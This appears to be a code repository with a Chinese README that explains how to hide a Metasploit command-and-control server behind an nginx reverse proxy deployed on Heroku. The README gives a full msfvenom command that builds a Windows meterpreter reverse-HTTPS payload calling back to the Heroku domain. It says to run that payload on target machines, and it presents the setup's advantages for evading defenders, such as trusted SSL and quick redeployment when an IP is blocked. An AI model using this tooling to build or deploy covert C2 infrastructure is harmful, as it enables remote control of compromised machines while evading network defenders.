├── Dockerfile
├── README.md
├── app.json
├── configure.sh
└── heroku.yml


/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx
2 | ADD configure.sh /configure.sh
3 | RUN chmod +x /configure.sh
4 | CMD /configure.sh
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 利用heroku隐藏C2服务器
 2 | Heroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤.
 3 | 
 4 | - 首先注册Heroku账号，点击通过 [https://dashboard.heroku.com](https://dashboard.heroku.com/) 注册一个账号 (推荐使用gmail)
 5 | - 注册成功以后登录，登录以后点击 [部署链接](https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku),
 6 | - app名称填写为 `mydiydomain` (可自定义,名称为后续域名前缀)，TARGET环境变量填写为C2的handler地址
 7 | 
 8 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771065455-e03973a0-8763-4402-8b92-db358f8d0b1f.png#align=left&display=inline&height=488&margin=%5Bobject%20Object%5D&name=image.png&originHeight=976&originWidth=1224&size=76155&status=done&style=none&width=612)
 9 | 
10 | - 然后点击 Deploy app 系统会自动部署.
11 | - 在metasploit-framework中添加handler,配置如图
12 | 
13 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771665090-ad5c1ecd-c257-44f3-9128-4430183a2e34.png#align=left&display=inline&height=191&margin=%5Bobject%20Object%5D&name=image.png&originHeight=381&originWidth=1334&size=59756&status=done&style=none&width=667)![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771713694-163331e4-cb96-4bb9-aa79-84980ab9c4ee.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=2281&size=88820&status=done&style=none&width=1140.5)
14 | 
15 | 
16 | - 执行 `to_handler` 生成listener
17 | - 使用如下命令生成payload
18 | ```bash
19 | msfvenom -p windows/x64/meterpreter_reverse_https LHOST=mydiydomain.herokuapp.com LPORT=443 -f exe -o ~/payload.exe
20 | ```
21 | 
22 | - 上传运行目标机器运行即可
23 | # 运行效果
24 | 
25 | - 在metasploit-framework中查看session如下,可以看到session的链接地址为heroku中转服务器地址
26 | 
27 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772048769-0192b120-768f-45ef-986f-4c13d4c1fae4.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=1737&size=32159&status=done&style=none&width=868.5)
28 | 
29 | - 在目标机抓包效果如下
30 | 
31 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772254394-2251f568-89ae-48de-9c55-36b864bbffb0.png#align=left&display=inline&height=33&margin=%5Bobject%20Object%5D&name=image.png&originHeight=66&originWidth=802&size=6382&status=done&style=none&width=401)
32 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772434299-3721e8f1-0eae-4296-b735-a741b20830d8.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=459&originWidth=1612&size=144248&status=done&style=none&width=806)
33 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772464467-3e81edaf-c634-42de-8e79-8ef5091a7c03.png#align=left&display=inline&height=768&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1535&originWidth=1296&size=272442&status=done&style=none&width=648)
34 | # 总结
35 | heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2.具体优势如下:
36 | 
37 | - 只需要注册heroku免费账号即可
38 | - 无需注册或购买域名
39 | - 自带可信的SSL证书(heroku域名自带证书)
40 | - 如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗
41 | - 操作步骤简单
42 | 


--------------------------------------------------------------------------------
/app.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "name": "nginx-proxy",
 3 |     "description": "Deploy nginx-proxy on Heroku.",
 4 |     "keywords": ["nginx-proxy"],
 5 |     "env": {
 6 |         "TARGET": {
 7 |             "description": "proxy target https://domain:port",
 8 |             "value": "https://baidu.com:443"
 9 |         }
10 |     },
11 |     "website": "",
12 |     "repository": "https://github.com/FunnyWolf/nginx-proxy-heroku",
13 |     "stack": "container"
14 | }
15 | 


--------------------------------------------------------------------------------
/configure.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | 
 3 | cat << EOF > /etc/nginx/nginx.conf
 4 | worker_processes  4;
 5 | events {
 6 |     worker_connections  1024;
 7 | }
 8 | http {
 9 |     include       mime.types;
10 |     default_type  application/octet-stream;
11 |     sendfile        on;
12 |     keepalive_timeout  300;
13 |     server {
14 |       listen "$PORT";
15 |       server_name  127.0.0.1;
16 |       gzip on;
17 |       gzip_min_length 1k;
18 |       gzip_comp_level 9;
19 |       gzip_types text/plain application/javascript application/x-javascript text/css application/xml text/javascript application/x-httpd-php image/jpeg image/gif image/png;
20 |       gzip_vary on;
21 |       gzip_disable "MSIE [1-6]\.";
22 |       location / {
23 |         proxy_pass  "$TARGET";
24 |       }
25 |       error_page   500 502 503 504  /50x.html;
26 |       location = /50x.html {
27 |         root   html;
28 |       }
29 |     }
30 | }
31 | EOF
32 | 
33 | nginx -g 'daemon off;'


--------------------------------------------------------------------------------
/heroku.yml:
--------------------------------------------------------------------------------
1 | build:
2 |   docker:
3 |     web: Dockerfile
4 | 


--------------------------------------------------------------------------------